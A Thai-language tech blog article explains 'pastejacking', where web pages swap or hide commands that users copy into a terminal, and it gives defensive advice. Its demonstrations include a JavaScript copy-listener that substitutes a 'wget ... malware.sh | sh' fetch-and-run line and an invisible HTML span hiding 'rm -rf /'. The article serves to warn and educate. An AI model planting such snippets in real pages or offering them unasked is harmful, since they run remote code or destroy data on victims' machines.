😊All Things N
ดูตามหัวข้อ ไมโครซอฟท์ วินโดวส์ แมคโอเอส ลีนุกซ์ แอนดรอยด์ ไอโฟน การเล่นเกม ปัญญาประดิษฐ์
😊All Things N

Contents

ทำไมคุณไม่ควรคัดลอก-วางคำสั่งจากอินเทอร์เน็ต

 included in Security Cybersecurity Remote Access Hacking Malware Html Javascript Coding Tips
   157 words   One minute 

ตั้งแต่คอมพิวเตอร์ไปจนถึงโทรศัพท์มือถือ การคัดลอกและวางแพร่หลายทุกที่ ช่วยให้ชีวิตง่ายขึ้นและประหยัดเวลาเนื่องจากคุณไม่จำเป็นต้องพิมพ์คำสั่งยาวๆ หรือข้อความซ้ำซ้อน อย่างไรก็ตาม หากคุณไม่ระมัดระวังเพียงพอ คุณสามารถถูกแฮ็กได้โดยเพียงแค่คัดลอกและวางคำสั่งบนเทอร์มินัลของคอมพิวเตอร์ของคุณ

เราจะเจาะลึกการสำรวจช่องโหว่ที่อาจเกิดขึ้นซึ่งเกี่ยวข้องกับแนวทางปฏิบัติในการทำซ้ำและการแทรกข้อความ ตลอดจนหารือเกี่ยวกับมาตรการป้องกันที่อาจใช้เพื่อป้องกันความเสี่ยงดังกล่าวหรือไม่

ทำไมคุณไม่ควรคัดลอกและวางคำสั่ง

ไม่ว่าจะเป็นผู้ใช้อินเทอร์เฟซบรรทัดคำสั่งที่ไม่มีประสบการณ์หรือผู้ปฏิบัติงานที่เชี่ยวชาญ ไม่ใช่เรื่องแปลกที่บุคคลจะใช้การคัดลอกและวางคำสั่งที่ได้รับจากแหล่งข้อมูลออนไลน์เพื่อเร่งขั้นตอนการทำงานและเพิ่มผลผลิต แม้ว่าวิธีการนี้อาจดูเหมือนมีประสิทธิภาพเมื่อมองแวบแรก แต่สิ่งสำคัญคือต้องรับรู้ว่าเว็บไซต์ที่เป็นอันตรายบางแห่งได้ใช้ประโยชน์จากแนวทางปฏิบัตินี้โดยการฝังโค้ดที่เป็นอันตรายไว้ในกล่องข้อความที่คัดลอก ดังนั้นจึงแอบนำมัลแวร์เข้าไปในระบบของผู้ใช้ที่ไม่สงสัยเมื่อพวกเขาวางคำสั่งลงในระบบของผู้ใช้โดยไม่รู้ตัว ขั้ว

เพื่อปกปิดคำสั่งที่มุ่งร้าย บุคคลที่ชั่วร้ายเหล่านี้ได้ใช้เทคนิคการหลอกลวงหลายอย่างในการติดตั้งส่วนหน้าของพวกเขา โดยแสดงผลโค้ดที่ดูเหมือนไม่มีอันตรายเป็นส่วนหน้าสำหรับการกระทำที่ซ่อนเร้นและเป็นอันตราย

โดยทั่วไปการดำเนินการคำสั่ง “sudo apt-get update && apt-get upgrade” ใช้เพื่ออัปเดตพื้นที่เก็บข้อมูลและอัปเกรดแพ็คเกจบนระบบ Linux อย่างไรก็ตาม ควรใช้ความระมัดระวังเมื่อใช้คำนำหน้า"sudo"เนื่องจากให้สิทธิ์ผู้ดูแลระบบ ซึ่งอาจทำให้สามารถเรียกใช้โค้ดที่เป็นอันตรายโดยที่ผู้ใช้ไม่รับรู้ ดังนั้นจึงจำเป็นอย่างยิ่งที่จะต้องตรวจสอบความถูกต้องของคำสั่งก่อนที่จะป้อนคำสั่งเหล่านั้นในเทอร์มินัล

ในสถานการณ์ที่เลวร้าย เป็นไปได้ว่าระบบทั้งหมดสามารถโค่นล้มหรือการโจมตีแรนซัมแวร์ได้ อาจตามมาด้วยผลที่ตามมา อย่างไรก็ตาม อะไรคือกลยุทธ์ที่แน่ชัดที่ใช้โดยหน่วยงานที่มุ่งร้ายเหล่านี้ในการดำเนินการดังกล่าว? คำสั่งที่เป็นอันตรายอาจซ่อนเร้นอยู่ในโค้ดที่ดูเหมือนไม่มีอันตรายด้วยวิธีใด

วิธีการทำงานของโค้ดที่เป็นอันตราย

/th/images/poc-of-exploit.jpg

การโจมตีนี้สามารถดำเนินการได้โดยใช้โค้ด JavaScript ที่ออกแบบมาอย่างประณีต หรือแม้แต่ไวยากรณ์ HTML พื้นฐาน ภาษา JavaScript มีเครื่องมือที่เรียกว่า “EventListener” ซึ่งช่วยให้สามารถตรวจจับและจัดการเหตุการณ์ต่างๆ ที่อาจเกิดขึ้นภายในเว็บเบราว์เซอร์ รวมถึงแต่ไม่จำกัดเพียงการคลิกปุ่ม การส่งแบบฟอร์ม การย้าย เคอร์เซอร์ ปุ่มพิมพ์ หรือการปรับขนาดวิวพอร์ต

EventListener ทำหน้าที่เป็นเครื่องมือสำคัญในการทำให้เว็บแอปพลิเคชันสามารถตอบสนองอย่างเหมาะสมต่อเหตุการณ์เฉพาะที่เริ่มต้นโดยการกระทำของผู้ใช้ น่าเสียดายที่เป็นที่ทราบกันว่าเว็บไซต์ไร้หลักการใช้ประโยชน์จากฟังก์ชันการทำงานที่เป็นประโยชน์นี้โดยการสกัดกั้นกรณีที่ผู้ใช้กำลังคัดลอกข้อความและแทนที่ด้วยโค้ดที่เป็นอันตราย

รหัสหลักที่ใช้ในการสร้างภาพสาธิตมีดังนี้:

 <script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

นี่คือการสาธิตการใช้ HTML ธรรมดาโดยไม่ต้องใช้ภาษาสคริปต์เช่น JavaScript:

 <p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p>

การใช้แบบอักษรสีขาวที่มองไม่เห็นจะปกปิดคำสั่งที่เป็นอันตราย “rm-rf/” ในขณะที่การใช้องค์ประกอบตัวแบ่งบรรทัด HTML ( ) ช่วยให้เทอร์มินัลบางตัวสามารถดำเนินการเนื้อหาโดยอัตโนมัติเมื่อวาง ตรงกันข้ามกับความเชื่อที่นิยม เราไม่จำเป็นต้องมีความเชี่ยวชาญขั้นสูงในการเขียนโปรแกรมหรือการพัฒนาเว็บเพื่อที่จะโจมตีทางไซเบอร์ดังกล่าวได้สำเร็จ ค่อนข้างจะเป็นเรื่องง่ายอย่างน่าทึ่งที่จะทำให้สำเร็จ

แม้ว่าจะไม่คุ้นเคยกับ JavaScript หรือการพัฒนาเว็บ แม้แต่ผู้ใช้มือใหม่ก็อาจใช้ ChatGPT เพื่อพัฒนาโค้ดที่เป็นอันตรายได้ ด้วยการให้ข้อมูลเชิงกลยุทธ์ บุคคลที่ไร้ศีลธรรมสามารถใช้ประโยชน์จากช่องโหว่ในระบบ ประนีประนอมมาตรการรักษาความปลอดภัยได้อย่างมีประสิทธิภาพ และสั่งให้สร้างเว็บไซต์ที่เป็นอันตรายโดยใช้จุดอ่อนเหล่านี้

คุณจะป้องกันตัวเองได้อย่างไร

/th/images/blue-purple-coding.jpg

แม้ว่าจะไม่มีวิธีการป้องกันตนเองจากการโจมตีโค้ดที่เป็นอันตรายที่เข้าใจผิดได้ แต่บุคคลหนึ่งอาจใช้มาตรการป้องกันบางอย่าง เช่น ห้ามเรียกใช้ JavaScript บนเว็บไซต์ที่ถือว่าอาจเป็นอันตราย อย่างไรก็ตาม เป็นที่น่าสังเกตว่าเว็บแอปพลิเคชันสมัยใหม่จำนวนมากต้องการ JavaScript เพื่อให้ทำงานได้อย่างถูกต้อง ดังนั้นการปิดใช้งานโดยสิ้นเชิงอาจเป็นอุปสรรคต่อความสามารถในการเรียกดู

นอกจากนี้ แนวทาง Cascading Style Sheets ยังนำเสนอความท้าทายในแง่ของการป้องกันสคริปต์ที่เป็นอันตราย เนื่องจากมีการใช้โค้ด CSS ที่ถูกต้องตามกฎหมาย แม้ว่าเจตนาจะยังคงเป็นอันตรายก็ตาม เพื่อความปลอดภัยของตัวเองอย่างมีประสิทธิภาพ การปฏิบัติตามหลักปฏิบัติด้านสุขอนามัยขั้นพื้นฐานและการเฝ้าระวังทางออนไลน์เป็นสิ่งสำคัญยิ่ง

เมื่อใช้บรรทัดคำสั่ง ขอแนะนำให้ใช้ความระมัดระวังเมื่อนำทางลิงก์ที่ไม่คุ้นเคยหรือน่าสงสัย เพื่อลดความเสี่ยงด้านความปลอดภัยที่อาจเกิดขึ้น ขอแนะนำให้ผู้ใช้ตรวจสอบความถูกต้องของคำสั่งใดๆ ที่ได้รับจากแหล่งภายนอกโดยการตรวจสอบภายในแอปพลิเคชันแก้ไขข้อความ ก่อนที่จะดำเนินการคำสั่งเหล่านั้นในสภาพแวดล้อมเทอร์มินัล ด้วยการยึดมั่นในคลังเก็บโค้ดที่น่าเชื่อถือและเป็นที่ยอมรับ บุคคลสามารถลดโอกาสที่จะนำโค้ดที่เป็นอันตรายเข้าสู่ระบบของพวกเขาด้วยวิธีการที่ไม่สงสัย

นอกจากนี้ เทอร์มินัลอีมูเลเตอร์บางตัว เช่น xfce4-terminal มีมาตรการรักษาความปลอดภัยในตัวเพื่อป้องกันการคัดลอกและวางคำสั่งโดยไม่ได้รับอนุญาต คุณสมบัตินี้จะแสดงการแจ้งเตือนที่สรุปการดำเนินการเฉพาะที่จะดำเนินการเมื่อวางคำสั่งในเทอร์มินัล เพื่อให้แน่ใจว่าเทอร์มินัลของคุณมีฟังก์ชันนี้ด้วย โปรดตรวจสอบความพร้อมใช้งานและเปิดใช้งานตามนั้น

การเรียกใช้โค้ดที่เป็นอันตรายเป็นอันตรายอย่างยิ่ง

แม้ว่าจะมีโปรแกรมแอนตี้ไวรัสแล้ว แต่ซอฟต์แวร์อันตรายบางประเภทก็อาจยังสามารถจัดการฝ่าฝืนการป้องกันความปลอดภัยของอุปกรณ์ได้ ดังนั้นจึงจำเป็นอย่างยิ่งที่ต้องใช้ความระมัดระวังเมื่อดาวน์โหลดหรือคัดลอกโค้ดใดๆ จากอินเทอร์เน็ต และใช้มาตรการป้องกันที่จำเป็นเพื่อป้องกันภัยคุกคามที่อาจเกิดขึ้น

Updated on 2023-08-30
Back | Home